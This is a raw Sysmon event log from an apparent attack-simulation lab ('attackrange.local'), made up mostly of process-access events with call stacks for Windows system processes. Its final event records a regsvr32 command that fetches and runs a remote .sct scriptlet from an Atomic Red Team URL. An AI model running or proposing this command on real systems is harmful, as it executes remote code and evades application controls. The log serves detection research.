Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+2976b|c:\windows\system32\capabilityaccessmanager.dll+1c7d5|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000361092Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+28ff4|c:\windows\system32\capabilityaccessmanager.dll+1c666|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000361091Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14517|C:\Windows\System32\CapabilityAccessManagerClient.dll+141f0|C:\Windows\System32\CapabilityAccessManagerClient.dll+151b5|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361090Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1f387|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361089Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14387|C:\Windows\System32\CapabilityAccessManagerClient.dll+15172|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361088Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.499{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000361087Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.484{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361086Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.484{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361085Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.484{8e433fbf-337b-6013-8402-000000001100}16567556C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361084Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.484{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361083Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361082Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361081Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361080Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x800000000000000032799Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.569{FF16AF91-26B5-6013-0B00-00000000A401}860600C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-7203-00000000A401}2076C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032798Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.554{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7203-00000000A401}2076C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032797Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.554{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7203-00000000A401}2076C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032796Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.554{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032795Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032794Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-6F03-00000000A401}5388C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032793Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032792Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032791Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032790Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032789Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-26BA-6013-2300-00000000A401}28124716C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7203-00000000A401}2076C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032788Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.538{FF16AF91-36E1-6013-7103-00000000A401}19243852C:\Windows\system32\cmd.exe{FF16AF91-36E1-6013-7203-00000000A401}2076C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032787Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.546{FF16AF91-36E1-6013-7203-00000000A401}2076C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll 